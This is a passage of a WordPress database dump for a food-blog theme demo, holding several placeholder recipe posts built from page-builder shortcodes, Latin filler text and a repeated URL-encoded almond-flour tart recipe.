instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Figs Smoothies','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','figs-smoothies','','','2020-04-09 18:20:24','2020-04-09 18:20:24','',0,'http://succulents.select-themes.com/?p=2126',0,'post','',0),(2129,1,'2018-02-06 10:37:54','2018-02-06 10:37:54','','blog-recipe-2','','inherit','open','closed','','blog-recipe-2','','','2018-02-06 10:37:54','2018-02-06 10:37:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/blog-recipe-2.jpg',0,'attachment','image/jpeg',0),(2131,1,'2018-02-06 10:38:51','2018-02-06 10:38:51','','t2','','publish','closed','closed','','t2','','','2018-02-06 10:38:51','2018-02-06 10:38:51','',0,'http://succulents.select-themes.com/?post_type=testimonials&p=2131',0,'testimonials','',0),(2132,1,'2018-01-15 10:39:47','2018-01-15 10:39:47','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Veggie Dinner','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','veggie-dinner','','','2020-04-09 18:27:07','2020-04-09 18:27:07','',0,'http://succulents.select-themes.com/?p=2132',0,'post','',0),(2135,1,'2018-02-06 10:40:43','2018-02-06 10:40:43','','blog-recipe-3','','inherit','open','closed','','blog-recipe-3','','','2018-02-06 10:40:43','2018-02-06 10:40:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-recipe-3.jpg',0,'attachment','image/jpeg',0),(2138,1,'2018-01-05 10:43:44','2018-01-05 10:43:44','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Fantastic Lunch Servings','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','fantastic-lunch-servings','','','2020-04-09 18:32:56','2020-04-09 18:32:56','',0,'http://succulents.select-themes.com/?p=2138',0,'post','',0),(2139,1,'2018-02-06 10:44:45','2018-02-06 10:44:45','','blog-recipe-4','','inherit','open','closed','','blog-recipe-4','','','2018-02-06 10:44:45','2018-02-06 10:44:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/blog-recipe-4.jpg',0,'attachment','image/jpeg',0),(2142,1,'2018-01-12 11:22:44','2018-01-12 11:22:44','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','ORANGE TEA','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','fruit-salad','','','2020-04-12 17:11:34','2020-04-12 17:11:34','',0,'http://succulents.select-themes.com/?p=2142',0,'post','',0),(2143,1,'2018-01-11 11:22:46','2018-01-11 11:22:46','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\n\n**You can use tapioca or cornstarch instead.\n\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Coconut Bombs','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','coconut-bombs','','','2018-01-11 11:22:46','2018-01-11 11:22:46','',0,'http://succulents.select-themes.com/?p=2143',0,'post','',0),(2144,1,'2018-01-10 11:22:47','2018-01-10 11:22:47','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Delicious Smoothie','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','delicious-smoothie','','','2020-04-09 10:03:49','2020-04-09 10:03:49','',0,'http://succulents.select-themes.com/?p=2144',0,'post','',0),(2145,1,'2018-01-06 11:22:49','2018-01-06 11:22:49','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
